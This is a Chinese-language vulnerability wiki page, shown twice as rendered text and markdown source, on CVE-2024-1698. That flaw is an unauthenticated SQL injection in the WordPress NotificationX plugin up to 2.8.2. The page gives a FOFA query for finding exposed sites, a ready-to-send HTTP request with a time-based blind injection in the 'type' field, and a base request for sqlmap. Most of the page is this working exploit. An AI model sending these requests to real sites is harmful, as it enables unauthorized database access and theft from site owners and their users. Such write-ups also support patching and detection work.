fofamini-wiki

登录白背景

源码

WordPress Plugin NotificationX 存在SQL注入漏洞(CVE-2024-1698)

一、漏洞简介

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台，该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress Plugin NotificationX是一个应用插件，其2.8.2及之前的版本存在一个SQL注入漏洞(CVE-2024-1698)。该漏洞的原因是插件中对参数的转义不够完善，并且对现有的SQL查询缺乏有效的过滤。攻击者可以利用"type"参数进行SQL注入攻击，未经身份验证的攻击者可以在现有查询语句中追加其他的SQL查询。

二、影响版本

WordPress Plugin NotificationX<=2.8.2

三、资产测绘

fofabody="/wp-content/plugins/notificationx"
特征

四、漏洞复现

POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6) AppleWebKit/610.4.3.1.7 (KHTML, like Gecko) Version/9.1.2 Safari/610.4.3.1.7
Connection: close
Content-Length: 53
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

sqlmap

POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6) AppleWebKit/610.4.3.1.7 (KHTML, like Gecko) Version/9.1.2 Safari/610.4.3.1.7
Connection: close
Content-Length: 53
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"nx_id": "1","type": "clicks`=1"}

wordpress-notification-analytics-sqli.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/gb9dc0huklz5gtps

# WordPress Plugin NotificationX 存在SQL注入漏洞(CVE-2024-1698)

# 一、漏洞简介
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台，该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress Plugin NotificationX是一个应用插件，其2.8.2及之前的版本存在一个SQL注入漏洞(CVE-2024-1698)。该漏洞的原因是插件中对参数的转义不够完善，并且对现有的SQL查询缺乏有效的过滤。攻击者可以利用"type"参数进行SQL注入攻击，未经身份验证的攻击者可以在现有查询语句中追加其他的SQL查询。

# 二、影响版本
+ WordPress Plugin NotificationX<=2.8.2

# 三、资产测绘
+ fofa`body="/wp-content/plugins/notificationx"`
+ 特征

![1711276977635-b8fe060b-0e99-48ae-b5d8-1056b64c4676.png](./img/fzAdLYQTdoMpVvNZ/1711276977635-b8fe060b-0e99-48ae-b5d8-1056b64c4676-776175.png)

# 四、漏洞复现
```plain
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6) AppleWebKit/610.4.3.1.7 (KHTML, like Gecko) Version/9.1.2 Safari/610.4.3.1.7
Connection: close
Content-Length: 53
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
```

![1711277129660-e743fa5a-98e4-406b-b08b-7ef01938b384.png](./img/fzAdLYQTdoMpVvNZ/1711277129660-e743fa5a-98e4-406b-b08b-7ef01938b384-426803.png)

sqlmap

```plain
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6) AppleWebKit/610.4.3.1.7 (KHTML, like Gecko) Version/9.1.2 Safari/610.4.3.1.7
Connection: close
Content-Length: 53
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"nx_id": "1","type": "clicks`=1"}
```

![1711278284680-d196fbb3-3e5a-4ee8-9e7c-1b08245b8590.png](./img/fzAdLYQTdoMpVvNZ/1711278284680-d196fbb3-3e5a-4ee8-9e7c-1b08245b8590-119487.png)

[wordpress-notification-analytics-sqli.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/29512878/1733989924305-ad627352-6e32-4359-a8f8-d62b604f81bb.yaml)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gb9dc0huklz5gtps>